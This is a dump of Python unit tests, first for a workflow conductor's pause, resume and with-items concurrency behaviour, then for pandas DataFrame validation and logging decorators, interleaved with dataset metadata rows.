    self.assert_task_list(conductor, actual_tasks, expected_tasks)
    # Set the items to running status.
    for i in range(0, len(task_ctx["xs"])):
        self.forward_task_item_statuses(conductor, task_name, i, [statuses.RUNNING])
    # Assert that the task is running.
    actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
    self.assertEqual(actual_task_status, statuses.RUNNING)
    # Pause the workflow. PAUSED is requested but items are active, so the
    # conductor reports PAUSING until they finish.
    conductor.request_workflow_status(statuses.PAUSED)
    self.assertEqual(conductor.get_workflow_status(), statuses.PAUSING)
    actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
    self.assertEqual(actual_task_status, statuses.PAUSING)
    # Complete the items.
    for i in range(0, len(task_ctx["xs"])):
        result = task_ctx["xs"][i]
        status_changes = [statuses.SUCCEEDED]
        self.forward_task_item_statuses(conductor, task_name, i, status_changes, result=result)
    # Assert the task succeeded and the workflow settled at PAUSED.
    actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
    self.assertEqual(actual_task_status, statuses.SUCCEEDED)
    self.assertEqual(conductor.get_workflow_status(), statuses.PAUSED)
    # Resume the workflow; nothing is left to run, so it completes.
    conductor.request_workflow_status(statuses.RESUMING)
    self.assertEqual(conductor.get_workflow_status(), statuses.SUCCEEDED)
def test_pause_workflow_using_pausing_status_with_items_concurrency(self):
    """Pause (via PAUSING) between concurrency batches of a with-items task.

    The first batch of 2 items completes before the pause is requested, so
    the pause takes effect immediately; resuming schedules the second batch.
    """
    wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with:
items: <% ctx(xs) %>
concurrency: 2
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
    concurrency = 2
    spec = native_specs.WorkflowSpec(wf_def)
    self.assertDictEqual(spec.inspect(), {})
    conductor = conducting.WorkflowConductor(spec)
    conductor.request_workflow_status(statuses.RUNNING)
    # Mock the action execution for each item and assert expected task statuses.
    task_route = 0
    task_name = "task1"
    task_ctx = {"xs": ["fee", "fi", "fo", "fum"]}
    task_action_specs = [
        {"action": "core.echo", "input": {"message": "fee"}, "item_id": 0},
        {"action": "core.echo", "input": {"message": "fi"}, "item_id": 1},
        {"action": "core.echo", "input": {"message": "fo"}, "item_id": 2},
        {"action": "core.echo", "input": {"message": "fum"}, "item_id": 3},
    ]
    # Run the first batch (concurrency=2) to completion.
    mock_ac_ex_statuses = [statuses.SUCCEEDED] * 2
    expected_task_statuses = [statuses.RUNNING] * 2
    expected_workflow_statuses = [statuses.RUNNING] * 2
    self.assert_task_items(
        conductor,
        task_name,
        task_route,
        task_ctx,
        task_ctx["xs"],
        task_action_specs,
        mock_ac_ex_statuses,
        expected_task_statuses,
        expected_workflow_statuses,
        concurrency=concurrency,
    )
    # Assert the task is not removed from staging (items remain).
    self.assertIsNotNone(conductor.workflow_state.get_staged_task(task_name, task_route))
    # Assert the workflow is still running.
    self.assertEqual(conductor.get_workflow_status(), statuses.RUNNING)
    # Pause the workflow. No items are in flight, so the pause completes immediately.
    conductor.request_workflow_status(statuses.PAUSING)
    self.assertEqual(conductor.get_workflow_status(), statuses.PAUSED)
    actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
    self.assertEqual(actual_task_status, statuses.PAUSED)
    # Resume the workflow.
    conductor.request_workflow_status(statuses.RESUMING)
    self.assertEqual(conductor.get_workflow_status(), statuses.RESUMING)
    # Verify the second set of action executions.
    expected_task = self.format_task_item(
        task_name,
        task_route,
        task_ctx,
        conductor.spec.tasks.get_task(task_name),
        actions=task_action_specs[concurrency:],
        items_count=len(task_ctx["xs"]),
        items_concurrency=concurrency,
    )
    expected_tasks = [expected_task]
    actual_tasks = conductor.get_next_tasks()
    self.assert_task_list(conductor, actual_tasks, expected_tasks)
    # Set the items to running status.
    for i in range(0 + concurrency, len(task_ctx["xs"])):
        self.forward_task_item_statuses(conductor, task_name, i, [statuses.RUNNING])
    # Assert that the task is running.
    actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
    self.assertEqual(actual_task_status, statuses.RUNNING)
    self.assertEqual(conductor.get_workflow_status(), statuses.RUNNING)
    # Complete the items.
    for i in range(0 + concurrency, len(task_ctx["xs"])):
        result = task_ctx["xs"][i]
        status_changes = [statuses.SUCCEEDED]
        self.forward_task_item_statuses(conductor, task_name, i, status_changes, result=result)
    # Assert the task and workflow are completed.
    actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
    self.assertEqual(actual_task_status, statuses.SUCCEEDED)
    self.assertEqual(conductor.get_workflow_status(), statuses.SUCCEEDED)
def test_pause_workflow_using_paused_status_with_items_concurrency(self):
    """Pause (via PAUSED) between concurrency batches of a with-items task.

    Mirrors the PAUSING variant: with no items in flight, a PAUSED request
    is honored immediately, and resuming schedules the second batch.
    """
    wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with:
items: <% ctx(xs) %>
concurrency: 2
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
    concurrency = 2
    spec = native_specs.WorkflowSpec(wf_def)
    self.assertDictEqual(spec.inspect(), {})
    conductor = conducting.WorkflowConductor(spec)
    conductor.request_workflow_status(statuses.RUNNING)
    # Mock the action execution for each item and assert expected task statuses.
    task_route = 0
    task_name = "task1"
    task_ctx = {"xs": ["fee", "fi", "fo", "fum"]}
    task_action_specs = [
        {"action": "core.echo", "input": {"message": "fee"}, "item_id": 0},
        {"action": "core.echo", "input": {"message": "fi"}, "item_id": 1},
        {"action": "core.echo", "input": {"message": "fo"}, "item_id": 2},
        {"action": "core.echo", "input": {"message": "fum"}, "item_id": 3},
    ]
    # Run the first batch (concurrency=2) to completion.
    mock_ac_ex_statuses = [statuses.SUCCEEDED] * 2
    expected_task_statuses = [statuses.RUNNING] * 2
    expected_workflow_statuses = [statuses.RUNNING] * 2
    self.assert_task_items(
        conductor,
        task_name,
        task_route,
        task_ctx,
        task_ctx["xs"],
        task_action_specs,
        mock_ac_ex_statuses,
        expected_task_statuses,
        expected_workflow_statuses,
        concurrency=concurrency,
    )
    # Assert the task is not removed from staging (items remain).
    self.assertIsNotNone(conductor.workflow_state.get_staged_task(task_name, task_route))
    # Assert the workflow is still running.
    self.assertEqual(conductor.get_workflow_status(), statuses.RUNNING)
    # Pause the workflow. No items are in flight, so PAUSED takes effect immediately.
    conductor.request_workflow_status(statuses.PAUSED)
    self.assertEqual(conductor.get_workflow_status(), statuses.PAUSED)
    actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
    self.assertEqual(actual_task_status, statuses.PAUSED)
    # Resume the workflow.
    conductor.request_workflow_status(statuses.RESUMING)
    self.assertEqual(conductor.get_workflow_status(), statuses.RESUMING)
    # Verify the second set of action executions.
    expected_task = self.format_task_item(
        task_name,
        task_route,
        task_ctx,
        conductor.spec.tasks.get_task(task_name),
        actions=task_action_specs[concurrency:],
        items_count=len(task_ctx["xs"]),
        items_concurrency=concurrency,
    )
    expected_tasks = [expected_task]
    actual_tasks = conductor.get_next_tasks()
    self.assert_task_list(conductor, actual_tasks, expected_tasks)
    # Set the items to running status.
    for i in range(0 + concurrency, len(task_ctx["xs"])):
        self.forward_task_item_statuses(conductor, task_name, i, [statuses.RUNNING])
    # Assert that the task is running.
    actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
    self.assertEqual(actual_task_status, statuses.RUNNING)
    self.assertEqual(conductor.get_workflow_status(), statuses.RUNNING)
    # Complete the items.
    for i in range(0 + concurrency, len(task_ctx["xs"])):
        result = task_ctx["xs"][i]
        status_changes = [statuses.SUCCEEDED]
        self.forward_task_item_statuses(conductor, task_name, i, status_changes, result=result)
    # Assert the task and workflow are completed.
    actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
    self.assertEqual(actual_task_status, statuses.SUCCEEDED)
    self.assertEqual(conductor.get_workflow_status(), statuses.SUCCEEDED)
def test_pause_workflow_with_items_concurrency_and_active(self):
    """Pause while the first concurrency batch is still actively running.

    The pause is deferred (PAUSING) until the in-flight batch completes,
    then the task/workflow land at PAUSED; resuming runs the second batch
    to completion.
    """
    wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with:
items: <% ctx(xs) %>
concurrency: 2
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
    concurrency = 2
    spec = native_specs.WorkflowSpec(wf_def)
    self.assertDictEqual(spec.inspect(), {})
    conductor = conducting.WorkflowConductor(spec)
    conductor.request_workflow_status(statuses.RUNNING)
    # Mock the action execution for each item and assert expected task statuses.
    task_route = 0
    task_name = "task1"
    task_ctx = {"xs": ["fee", "fi", "fo", "fum"]}
    task_action_specs = [
        {"action": "core.echo", "input": {"message": "fee"}, "item_id": 0},
        {"action": "core.echo", "input": {"message": "fi"}, "item_id": 1},
        {"action": "core.echo", "input": {"message": "fo"}, "item_id": 2},
        {"action": "core.echo", "input": {"message": "fum"}, "item_id": 3},
    ]
    # Verify the first set of action executions.
    expected_task = self.format_task_item(
        task_name,
        task_route,
        task_ctx,
        conductor.spec.tasks.get_task(task_name),
        actions=task_action_specs[0:concurrency],
        items_count=len(task_ctx["xs"]),
        items_concurrency=concurrency,
    )
    expected_tasks = [expected_task]
    actual_tasks = conductor.get_next_tasks()
    self.assert_task_list(conductor, actual_tasks, expected_tasks)
    # Set the items to running status.
    for i in range(0, concurrency):
        self.forward_task_item_statuses(conductor, task_name, i, [statuses.RUNNING])
    # Assert that the task is running.
    actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
    self.assertEqual(actual_task_status, statuses.RUNNING)
    # Pause the workflow. Items are active, so the pause is deferred.
    conductor.request_workflow_status(statuses.PAUSING)
    self.assertEqual(conductor.get_workflow_status(), statuses.PAUSING)
    actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
    self.assertEqual(actual_task_status, statuses.PAUSING)
    # Complete the items.
    for i in range(0, concurrency):
        result = task_ctx["xs"][i]
        status_changes = [statuses.SUCCEEDED]
        self.forward_task_item_statuses(conductor, task_name, i, status_changes, result=result)
    # Assert the task and workflow are paused.
    actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
    self.assertEqual(actual_task_status, statuses.PAUSED)
    self.assertEqual(conductor.get_workflow_status(), statuses.PAUSED)
    # Resume the workflow.
    conductor.request_workflow_status(statuses.RESUMING)
    self.assertEqual(conductor.get_workflow_status(), statuses.RESUMING)
    # Verify the second set of action executions.
    expected_task = self.format_task_item(
        task_name,
        task_route,
        task_ctx,
        conductor.spec.tasks.get_task(task_name),
        actions=task_action_specs[concurrency:],
        items_count=len(task_ctx["xs"]),
        items_concurrency=concurrency,
    )
    expected_tasks = [expected_task]
    actual_tasks = conductor.get_next_tasks()
    self.assert_task_list(conductor, actual_tasks, expected_tasks)
    # Set the items to running status.
    for i in range(0 + concurrency, len(task_ctx["xs"])):
        self.forward_task_item_statuses(conductor, task_name, i, [statuses.RUNNING])
    # Assert that the task is running.
    actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
    self.assertEqual(actual_task_status, statuses.RUNNING)
    self.assertEqual(conductor.get_workflow_status(), statuses.RUNNING)
    # Complete the items.
    for i in range(0 + concurrency, len(task_ctx["xs"])):
        result = task_ctx["xs"][i]
        status_changes = [statuses.SUCCEEDED]
        self.forward_task_item_statuses(conductor, task_name, i, status_changes, result=result)
    # Assert the task and workflow are completed.
    actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
    self.assertEqual(actual_task_status, statuses.SUCCEEDED)
    self.assertEqual(conductor.get_workflow_status(), statuses.SUCCEEDED)
def test_pending_item_list_processed(self):
    """A PENDING item pauses a with-items task once the other items finish.

    Item 1 goes PENDING; the task transitions through PAUSING and lands at
    PAUSED along with the workflow, with the task kept in staging.
    """
    wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
    spec = native_specs.WorkflowSpec(wf_def)
    self.assertDictEqual(spec.inspect(), {})
    conductor = conducting.WorkflowConductor(spec)
    conductor.request_workflow_status(statuses.RUNNING)
    # Mock the action execution for each item and assert expected task statuses.
    task_route = 0
    task_name = "task1"
    task_ctx = {"xs": ["fee", "fi", "fo", "fum"]}
    task_action_specs = [
        {"action": "core.echo", "input": {"message": "fee"}, "item_id": 0},
        {"action": "core.echo", "input": {"message": "fi"}, "item_id": 1},
        {"action": "core.echo", "input": {"message": "fo"}, "item_id": 2},
        {"action": "core.echo", "input": {"message": "fum"}, "item_id": 3},
    ]
    # Item 1 stays PENDING while the rest succeed.
    mock_ac_ex_statuses = [
        statuses.SUCCEEDED,
        statuses.PENDING,
        statuses.SUCCEEDED,
        statuses.SUCCEEDED,
    ]
    expected_task_statuses = [
        statuses.RUNNING,
        statuses.PAUSING,
        statuses.PAUSING,
        statuses.PAUSED,
    ]
    expected_workflow_statuses = [
        statuses.RUNNING,
        statuses.RUNNING,
        statuses.RUNNING,
        statuses.PAUSED,
    ]
    self.assert_task_items(
        conductor,
        task_name,
        task_route,
        task_ctx,
        task_ctx["xs"],
        task_action_specs,
        mock_ac_ex_statuses,
        expected_task_statuses,
        expected_workflow_statuses,
    )
    # Assert the task is not removed from staging.
    self.assertIsNotNone(conductor.workflow_state.get_staged_task(task_name, task_route))
    # Assert the workflow is paused.
    self.assertEqual(conductor.get_workflow_status(), statuses.PAUSED)
def test_resume_pending_item_list_processed(self):
    """Resume and complete a with-items task that paused on a PENDING item.

    After the workflow pauses (item 1 PENDING), the pending item is set
    back to RUNNING and then SUCCEEDED, which unstages the task and drives
    both task and workflow to SUCCEEDED.
    """
    wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
    spec = native_specs.WorkflowSpec(wf_def)
    self.assertDictEqual(spec.inspect(), {})
    conductor = conducting.WorkflowConductor(spec)
    conductor.request_workflow_status(statuses.RUNNING)
    # Mock the action execution for each item and assert expected task statuses.
    task_route = 0
    task_name = "task1"
    task_ctx = {"xs": ["fee", "fi", "fo", "fum"]}
    task_action_specs = [
        {"action": "core.echo", "input": {"message": "fee"}, "item_id": 0},
        {"action": "core.echo", "input": {"message": "fi"}, "item_id": 1},
        {"action": "core.echo", "input": {"message": "fo"}, "item_id": 2},
        {"action": "core.echo", "input": {"message": "fum"}, "item_id": 3},
    ]
    # Item 1 stays PENDING while the rest succeed.
    mock_ac_ex_statuses = [
        statuses.SUCCEEDED,
        statuses.PENDING,
        statuses.SUCCEEDED,
        statuses.SUCCEEDED,
    ]
    expected_task_statuses = [
        statuses.RUNNING,
        statuses.PAUSING,
        statuses.PAUSING,
        statuses.PAUSED,
    ]
    expected_workflow_statuses = [
        statuses.RUNNING,
        statuses.RUNNING,
        statuses.RUNNING,
        statuses.PAUSED,
    ]
    self.assert_task_items(
        conductor,
        task_name,
        task_route,
        task_ctx,
        task_ctx["xs"],
        task_action_specs,
        mock_ac_ex_statuses,
        expected_task_statuses,
        expected_workflow_statuses,
    )
    # Assert the task is not removed from staging.
    self.assertIsNotNone(conductor.workflow_state.get_staged_task(task_name, task_route))
    # Assert the workflow is paused.
    self.assertEqual(conductor.get_workflow_status(), statuses.PAUSED)
    # Resume the pending action execution.
    self.forward_task_item_statuses(conductor, task_name, 1, [statuses.RUNNING])
    # Assert the task and workflow are running.
    actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
    self.assertEqual(actual_task_status, statuses.RUNNING)
    staged_task = conductor.workflow_state.get_staged_task(task_name, task_route)
    self.assertEqual(staged_task["items"][1]["status"], statuses.RUNNING)
    self.assertEqual(conductor.get_workflow_status(), statuses.RUNNING)
    # Complete the resumed action execution.
    self.forward_task_item_statuses(
        conductor, task_name, 1, [statuses.SUCCEEDED], result=task_ctx["xs"][1]
    )
    # Assert the task is removed from staging.
    self.assertIsNone(conductor.workflow_state.get_staged_task(task_name, task_route))
    # Assert the task and workflow succeeded.
    actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
    self.assertEqual(actual_task_status, statuses.SUCCEEDED)
    self.assertEqual(conductor.get_workflow_status(), statuses.SUCCEEDED)
def test_resume_partial(self):
    """Resume only one of two PAUSED items; the task re-pauses afterwards.

    Items 1 and 2 are paused. Resuming and completing item 1 alone leaves
    item 2 paused, so the task stays staged and the task/workflow return
    to PAUSED rather than completing.
    """
    wf_def = """
version: 1.0
vars:
- xs:
- fee
- fi
- fo
- fum
tasks:
task1:
with: <% ctx(xs) %>
action: core.echo message=<% item() %>
next:
- publish:
- items: <% result() %>
output:
- items: <% ctx(items) %>
"""
    spec = native_specs.WorkflowSpec(wf_def)
    self.assertDictEqual(spec.inspect(), {})
    conductor = conducting.WorkflowConductor(spec)
    conductor.request_workflow_status(statuses.RUNNING)
    # Mock the action execution for each item and assert expected task statuses.
    task_route = 0
    task_name = "task1"
    task_ctx = {"xs": ["fee", "fi", "fo", "fum"]}
    task_action_specs = [
        {"action": "core.echo", "input": {"message": "fee"}, "item_id": 0},
        {"action": "core.echo", "input": {"message": "fi"}, "item_id": 1},
        {"action": "core.echo", "input": {"message": "fo"}, "item_id": 2},
        {"action": "core.echo", "input": {"message": "fum"}, "item_id": 3},
    ]
    # Items 1 and 2 pause while items 0 and 3 succeed.
    mock_ac_ex_statuses = [
        statuses.SUCCEEDED,
        statuses.PAUSED,
        statuses.PAUSED,
        statuses.SUCCEEDED,
    ]
    expected_task_statuses = [
        statuses.RUNNING,
        statuses.PAUSING,
        statuses.PAUSING,
        statuses.PAUSED,
    ]
    expected_workflow_statuses = [
        statuses.RUNNING,
        statuses.RUNNING,
        statuses.RUNNING,
        statuses.PAUSED,
    ]
    self.assert_task_items(
        conductor,
        task_name,
        task_route,
        task_ctx,
        task_ctx["xs"],
        task_action_specs,
        mock_ac_ex_statuses,
        expected_task_statuses,
        expected_workflow_statuses,
    )
    # Assert the task is not removed from staging.
    self.assertIsNotNone(conductor.workflow_state.get_staged_task(task_name, task_route))
    # Assert the workflow is paused.
    self.assertEqual(conductor.get_workflow_status(), statuses.PAUSED)
    # Resume the paused action execution for item 1 only.
    self.forward_task_item_statuses(conductor, task_name, 1, [statuses.RUNNING])
    # Assert the task and workflow are running.
    actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
    self.assertEqual(actual_task_status, statuses.RUNNING)
    staged_task = conductor.workflow_state.get_staged_task(task_name, task_route)
    self.assertEqual(staged_task["items"][1]["status"], statuses.RUNNING)
    self.assertEqual(conductor.get_workflow_status(), statuses.RUNNING)
    # Complete the resumed action execution.
    self.forward_task_item_statuses(
        conductor, task_name, 1, [statuses.SUCCEEDED], result=task_ctx["xs"][1]
    )
    # Assert the task is NOT removed from staging (item 2 is still paused).
    self.assertIsNotNone(conductor.workflow_state.get_staged_task(task_name, task_route))
    # Assert the task and workflow are paused again.
    actual_task_status = conductor.workflow_state.get_task(task_name, task_route)["status"]
    self.assertEqual(actual_task_status, statuses.PAUSED)
    self.assertEqual(conductor.get_workflow_status(), statuses.PAUSED)
| 34.817343
| 99
| 0.589237
| 4,007
| 37,742
| 5.306214
| 0.042176
| 0.032358
| 0.036215
| 0.040777
| 0.963033
| 0.961857
| 0.961763
| 0.961763
| 0.961763
| 0.961245
| 0
| 0.005453
| 0.300302
| 37,742
| 1,083
| 100
| 34.849492
| 0.799682
| 0.101399
| 0
| 0.916773
| 0
| 0
| 0.192436
| 0
| 0
| 0
| 0
| 0
| 0.1242
| 1
| 0.014085
| false
| 0
| 0.005122
| 0
| 0.020487
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fcd2adec202358a6aa955d1d1ca9b615d793da0e
| 7,997
|
py
|
Python
|
tests/test_decorators.py
|
dzeih/daffy
|
66d4dffebcf6a805dec418d73c6fc3890bbcf612
|
[
"MIT"
] | 11
|
2021-01-31T12:44:38.000Z
|
2021-09-29T06:26:19.000Z
|
tests/test_decorators.py
|
dzeih/daffy
|
66d4dffebcf6a805dec418d73c6fc3890bbcf612
|
[
"MIT"
] | 1
|
2021-01-31T15:09:00.000Z
|
2021-01-31T15:09:00.000Z
|
tests/test_decorators.py
|
dzeih/daffy
|
66d4dffebcf6a805dec418d73c6fc3890bbcf612
|
[
"MIT"
] | 2
|
2021-01-31T14:53:10.000Z
|
2022-03-16T12:41:18.000Z
|
import logging
from typing import Any
from unittest.mock import call
import pandas as pd
import pytest
from pytest_mock import MockerFixture
from daffy import df_in, df_log, df_out
@pytest.fixture
def basic_df() -> pd.DataFrame:
    """Fixture: 4-row DataFrame with columns Brand (str) and Price (int)."""
    cars = {
        "Brand": ["Honda Civic", "Toyota Corolla", "Ford Focus", "Audi A4"],
        "Price": [22000, 25000, 27000, 35000],
    }
    return pd.DataFrame(cars, columns=["Brand", "Price"])
@pytest.fixture
def extended_df() -> pd.DataFrame:
    """Fixture: same rows as basic_df plus a Year column."""
    cars = {
        "Brand": ["Honda Civic", "Toyota Corolla", "Ford Focus", "Audi A4"],
        "Price": [22000, 25000, 27000, 35000],
        "Year": [2020, 1998, 2001, 2021],
    }
    return pd.DataFrame(cars, columns=["Brand", "Price", "Year"])
def test_wrong_return_type() -> None:
    """df_out rejects a non-DataFrame return value."""
    @df_out()
    def test_fn() -> int:
        return 1

    with pytest.raises(AssertionError) as excinfo:
        test_fn()
    assert "Wrong return type" in str(excinfo.value)
def test_correct_return_type_and_no_column_constraints(basic_df: pd.DataFrame) -> None:
    """df_out with no column list accepts any DataFrame return."""
    @df_out()
    def test_fn() -> pd.DataFrame:
        return basic_df

    test_fn()
def test_correct_return_type_and_columns(basic_df: pd.DataFrame) -> None:
    """df_out accepts a return DataFrame containing exactly the listed columns."""
    @df_out(columns=["Brand", "Price"])
    def test_fn() -> pd.DataFrame:
        return basic_df

    test_fn()
def test_allow_extra_columns_out(basic_df: pd.DataFrame) -> None:
    """Non-strict df_out tolerates extra columns beyond those listed."""
    @df_out(columns=["Brand"])
    def test_fn() -> pd.DataFrame:
        return basic_df

    test_fn()
def test_correct_return_type_and_columns_strict(basic_df: pd.DataFrame) -> None:
    """strict df_out accepts a return DataFrame with exactly the listed columns."""
    @df_out(columns=["Brand", "Price"], strict=True)
    def test_fn() -> pd.DataFrame:
        return basic_df

    test_fn()
def test_extra_column_in_return_strict(basic_df: pd.DataFrame) -> None:
    """strict df_out rejects a return DataFrame with an unlisted column."""
    @df_out(columns=["Brand"], strict=True)
    def test_fn() -> pd.DataFrame:
        return basic_df

    with pytest.raises(AssertionError) as excinfo:
        test_fn()
    assert "DataFrame contained unexpected column(s): Price" in str(excinfo.value)
def test_missing_column_in_return(basic_df: pd.DataFrame) -> None:
    """df_out rejects a return DataFrame missing a required column."""
    @df_out(columns=["Brand", "FooColumn"])
    def test_fn() -> pd.DataFrame:
        return basic_df

    with pytest.raises(AssertionError) as excinfo:
        test_fn()
    assert "Column FooColumn missing" in str(excinfo.value)
def test_wrong_input_type_unnamed() -> None:
    """df_in rejects a non-DataFrame positional argument."""
    @df_in()
    def test_fn(my_input: Any) -> Any:
        return my_input

    with pytest.raises(AssertionError) as excinfo:
        test_fn("foobar")
    assert "Wrong parameter type" in str(excinfo.value)
def test_wrong_input_type_named() -> None:
    """df_in(name=...) rejects a non-DataFrame keyword argument."""
    @df_in(name="my_input")
    def test_fn(my_input: Any) -> Any:
        return my_input

    with pytest.raises(AssertionError) as excinfo:
        test_fn(my_input="foobar")
    assert "Wrong parameter type. Expected Pandas DataFrame, got str instead." in str(excinfo.value)
def test_correct_input_with_columns(basic_df: pd.DataFrame) -> None:
    """df_in accepts a DataFrame argument containing the listed columns."""
    @df_in(columns=["Brand", "Price"])
    def test_fn(my_input: Any) -> Any:
        return my_input

    test_fn(basic_df)
def test_correct_input_with_no_column_constraints(basic_df: pd.DataFrame) -> None:
    """df_in with no column list accepts any DataFrame argument."""
    @df_in()
    def test_fn(my_input: Any) -> Any:
        return my_input

    test_fn(basic_df)
def test_dfin_with_no_inputs() -> None:
    """df_in on a zero-argument function fails with a NoneType message."""
    @df_in()
    def test_fn() -> Any:
        return

    with pytest.raises(AssertionError) as excinfo:
        test_fn()
    assert "Wrong parameter type. Expected Pandas DataFrame, got NoneType instead." in str(excinfo.value)
def test_correct_named_input_with_columns(basic_df: pd.DataFrame) -> None:
    """df_in(name=...) validates only the named keyword argument."""
    @df_in(name="df", columns=["Brand", "Price"])
    def test_fn(my_input: Any, df: pd.DataFrame) -> pd.DataFrame:
        return df

    test_fn("foo", df=basic_df)
def test_correct_named_input_with_columns_strict(basic_df: pd.DataFrame) -> None:
    """strict df_in(name=...) accepts the named argument with exactly the listed columns."""
    @df_in(name="df", columns=["Brand", "Price"], strict=True)
    def test_fn(my_input: Any, df: pd.DataFrame) -> pd.DataFrame:
        return df

    test_fn("foo", df=basic_df)
def test_in_allow_extra_columns(basic_df: pd.DataFrame) -> None:
    """Non-strict df_in tolerates extra columns in the named argument."""
    @df_in(name="df", columns=["Brand"])
    def test_fn(my_input: Any, df: pd.DataFrame) -> pd.DataFrame:
        return df

    test_fn("foo", df=basic_df)
def test_in_strict_extra_columns(basic_df: pd.DataFrame) -> None:
    """strict df_in rejects an unlisted column in the named argument."""
    @df_in(name="df", columns=["Brand"], strict=True)
    def test_fn(my_input: Any, df: pd.DataFrame) -> pd.DataFrame:
        return df

    with pytest.raises(AssertionError) as excinfo:
        test_fn("foo", df=basic_df)
    assert "DataFrame contained unexpected column(s): Price" in str(excinfo.value)
def test_correct_input_with_columns_and_dtypes(basic_df: pd.DataFrame) -> None:
    """df_in with a column->dtype mapping accepts matching dtypes."""
    @df_in(columns={"Brand": "object", "Price": "int64"})
    def test_fn(my_input: Any) -> Any:
        return my_input

    test_fn(basic_df)
def test_dtype_mismatch(basic_df: pd.DataFrame) -> None:
    """df_in rejects a column whose dtype differs from the mapping."""
    @df_in(columns={"Brand": "object", "Price": "float64"})
    def test_fn(my_input: Any) -> Any:
        return my_input

    with pytest.raises(AssertionError) as excinfo:
        test_fn(basic_df)
    assert "Column Price has wrong dtype. Was int64, expected float64" in str(excinfo.value)
def test_df_in_incorrect_input(basic_df: pd.DataFrame) -> None:
    """df_in rejects an argument DataFrame missing a required column."""
    @df_in(columns=["Brand", "Price"])
    def test_fn(my_input: Any) -> Any:
        return my_input

    with pytest.raises(AssertionError) as excinfo:
        test_fn(basic_df[["Brand"]])
    assert "Column Price missing" in str(excinfo.value)
def test_df_out_with_df_modification(basic_df: pd.DataFrame, extended_df: pd.DataFrame) -> None:
    """df_out validates columns added by the wrapped function itself."""
    @df_out(columns=["Brand", "Price", "Year"])
    def test_fn(my_input: Any) -> Any:
        my_input["Year"] = list(extended_df["Year"])
        return my_input

    assert list(basic_df.columns) == ["Brand", "Price"]  # For sanity
    pd.testing.assert_frame_equal(extended_df, test_fn(basic_df.copy()))
def test_decorator_combinations(basic_df: pd.DataFrame, extended_df: pd.DataFrame) -> None:
    """df_in and df_out can be stacked on the same function."""
    @df_in(columns=["Brand", "Price"])
    @df_out(columns=["Brand", "Price", "Year"])
    def test_fn(my_input: Any) -> Any:
        my_input["Year"] = list(extended_df["Year"])
        return my_input

    pd.testing.assert_frame_equal(extended_df, test_fn(basic_df.copy()))
def test_log_df(basic_df: pd.DataFrame, mocker: MockerFixture) -> None:
    """df_log emits DEBUG log lines for DataFrame parameters and returns."""
    @df_log()
    def test_fn(foo_df: pd.DataFrame) -> pd.DataFrame:
        return basic_df

    # Patch daffy's logging call so the exact messages can be asserted.
    mock_log = mocker.patch("daffy.decorators.logging.log")
    test_fn(basic_df)
    mock_log.assert_has_calls(
        [
            call(
                logging.DEBUG,
                ("Function test_fn parameters contained a DataFrame: columns: ['Brand', 'Price']"),
            ),
            call(
                logging.DEBUG,
                "Function test_fn returned a DataFrame: columns: ['Brand', 'Price']",
            ),
        ]
    )
def test_log_df_with_dtypes(basic_df: pd.DataFrame, mocker: MockerFixture) -> None:
    """df_log(include_dtypes=True) appends dtype info to the log lines."""
    @df_log(include_dtypes=True)
    def test_fn(foo_df: pd.DataFrame) -> pd.DataFrame:
        return basic_df

    # Patch daffy's logging call so the exact messages can be asserted.
    mock_log = mocker.patch("daffy.decorators.logging.log")
    test_fn(basic_df)
    mock_log.assert_has_calls(
        [
            call(
                logging.DEBUG,
                (
                    "Function test_fn parameters contained a DataFrame: "
                    "columns: ['Brand', 'Price'] with dtypes ['object', 'int64']"
                ),
            ),
            call(
                logging.DEBUG,
                "Function test_fn returned a DataFrame: columns: ['Brand', 'Price'] with dtypes ['object', 'int64']",
            ),
        ]
    )
def test_log_non_df(mocker: MockerFixture) -> None:
    """df_log stays silent when neither parameters nor return are DataFrames."""
    @df_log()
    def test_fn(foo: str) -> int:
        return 123

    mock_log = mocker.patch("daffy.decorators.logging.log")
    test_fn("foo")
    mock_log.assert_not_called()
| 28.059649
| 117
| 0.649744
| 1,089
| 7,997
| 4.51607
| 0.110193
| 0.06344
| 0.076657
| 0.0732
| 0.857056
| 0.843432
| 0.828996
| 0.786295
| 0.756405
| 0.660431
| 0
| 0.011882
| 0.221208
| 7,997
| 284
| 118
| 28.158451
| 0.777778
| 0.00125
| 0
